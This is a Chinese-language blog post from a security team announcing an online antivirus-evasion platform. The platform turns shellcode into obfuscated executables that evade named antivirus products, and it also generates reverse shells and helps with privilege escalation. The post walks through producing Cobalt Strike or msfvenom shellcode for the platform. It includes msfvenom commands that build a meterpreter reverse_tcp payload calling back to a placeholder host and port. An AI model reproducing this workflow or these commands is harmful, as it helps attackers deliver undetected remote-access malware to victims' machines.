潮影線上免殺平臺上線了

語言: CN / TW / HK

2020年初,彙總整理了遠控免殺專題文章的工具篇、程式碼篇、白名單篇等,共70餘篇文章。當時一方面是web狗從零開始學習免殺知識,另一方面也是想做一個免殺平臺,文章寫完後時隔兩年免殺平臺才有了點眉目,希望以後能逐漸完善。

潮影線上免殺平臺: http://bypass.tidesec.com

免殺專題文章及工具:https://github.com/TideSec/BypassAntiVirus

平臺功能

目前平臺主要實現瞭如下功能: shellcode免殺windows提權輔助殺軟線上對比常見提權命令反彈shell命令

shellcode免殺

shellocde免殺使用了多種shellcode載入方式,目前以Go語言實現為主,後期會加入Powershell、C、nim等語言,對shellcode的處理使用了隨機變數、AES/RC4/多重Base64/Base85/異或演算法、偽造簽名、隨機圖示、免殺分離、條件觸發等方式,在本地測試的時候效果還是不錯的,但發現放到線上平臺後,可能樣本被上傳的比較多,免殺效果就比較一般了。但目前來說過火絨和360衛士還是沒有問題的。

使用也比較方便,只需要從Cobaltstrike或Msfvenom生成shellcode,填寫到shellcode框內,調整一些引數,便可以線上生成免殺的可執行檔案。

Cobaltstrike生成shellcode

在Cobaltstrike中 Attacks - packages - Payload Generator

然後選擇好 Listener 之後,Output選 C ,下面選擇 x64 ,免殺效果更好。

檢視生成的shellcode

把內容都整個複製到潮影線上免殺平臺的輸入框裡就可以。之後提交,等待幾秒鐘就可以下載了。

Metasploit 生成shellcode

生成64位的payload c語言檔案

msfvenom -p windows/x64/meterpreter/reverse_tcp -f c -o payload.c LHOST=1.1.1.1 LPORT=3333

或者直接生成hex格式

msfvenom -p windows/x64/meterpreter/reverse_tcp -f hex -o payload.c LHOST=1.1.1.1 LPORT=3333

上面生成的shellcode都可以直接複製到潮影線上免殺平臺,系統會自動處理後生成免殺程式。

windows提權輔助

主要提供了Windows提權EXP線上搜尋功能。

使用方式:執行cmd命令 systeminfo 獲取資訊,貼上 systeminfo 資訊或只貼上補丁資訊到編輯框內。

殺軟線上對比

在windows系統cmd中執行 tasklist ,將程序資訊輸入即可。

Reverse Shell

可快速生成各種反彈shell,如ncat、socat、bash、C、perl、php、powershell、python、ruby、golang、telnet等多種語言和程式,並可自定義進行base64編碼等。

平臺前端介面借鑑了 https://github.com/yhy0/AVByPass 專案,在此感謝大佬。

感謝團隊大佬 天下兵馬大都督 完成的前臺,並實現 windows提權輔助 殺軟線上對比 常見提權命令 反彈shell命令 等功能。

沒有 一勞永逸的免殺,只有精益求精的繞過,後續平臺也會繼續更新完善,早日將 更多語言、更多繞過姿勢也都併入到平臺中。

後面也會有幾篇針對Go免殺的專題文章,也會介紹免殺平臺的實現方式,希望對大家能有所幫助。

潮影線上免殺平臺: http://bypass.tidesec.com

Tide安全團隊正式成立於2019年1月,是新潮資訊旗下以網際網路攻防技術研究為目標的安全團隊,團隊致力於分享高質量原創文章、開源安全工具、交流安全技術,研究方向覆蓋網路攻防、系統安全、Web安全、移動終端、安全開發、物聯網/工控安全/AI安全等多個領域。

團隊作為“省級等保關鍵技術實驗室”先後與哈工大、齊魯銀行、聊城大學、交通學院等多個高校名企建立聯合技術實驗室,近三年來在網路安全技術方面開展研發專案60餘項,獲得各類自主智慧財產權30餘項,省市級科技專案立項20餘項,研究成果應用於產品核心技術研究、國家重點科技專案攻關、專業安全服務等。對安全感興趣的小夥伴可以加入或關注我們。